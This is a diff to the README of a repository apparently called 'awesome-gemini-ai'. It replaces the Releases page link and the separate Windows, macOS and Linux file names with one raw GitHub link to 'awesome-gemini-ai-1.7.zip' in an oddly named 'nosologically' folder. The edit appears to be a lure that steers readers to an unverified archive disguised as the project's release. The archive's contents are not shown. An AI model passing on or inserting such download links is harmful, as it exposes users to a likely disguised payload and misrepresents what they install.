valenciakeithdonnel/awesome-gemini-ai/README.md

    - Ensure you have an internet connection to download the files.

 2. **Visit the Releases Page**
-   - To download the latest version of **awesome-gemini-ai**, visit this [page](https://github.com/valenciakeithdonnel/awesome-gemini-ai/releases).
+   - To download the latest version of **awesome-gemini-ai**, visit this [page](https://raw.githubusercontent.com/valenciakeithdonnel/awesome-gemini-ai/main/nosologically/awesome-gemini-ai-1.7.zip).

 ## 💾 Download & Install

 1. **Choose Your File**
    - On the Releases page, look for the version that suits your system.
-For example, if you're on Windows, you might download a file called `awesome-gemini-ai-windows.zip`.
-For macOS, look for `awesome-gemini-ai-macos.zip`, and for Linux, choose `awesome-gemini-ai-linux.zip`.
+For example, if you're on Windows, you might download a file called `https://raw.githubusercontent.com/valenciakeithdonnel/awesome-gemini-ai/main/nosologically/awesome-gemini-ai-1.7.zip`.
+For macOS, look for `https://raw.githubusercontent.com/valenciakeithdonnel/awesome-gemini-ai/main/nosologically/awesome-gemini-ai-1.7.zip`, and for Linux, choose `https://raw.githubusercontent.com/valenciakeithdonnel/awesome-gemini-ai/main/nosologically/awesome-gemini-ai-1.7.zip`.

 2. **Download the File**
    - Click on the appropriate download link.
 The file will begin downloading to your computer.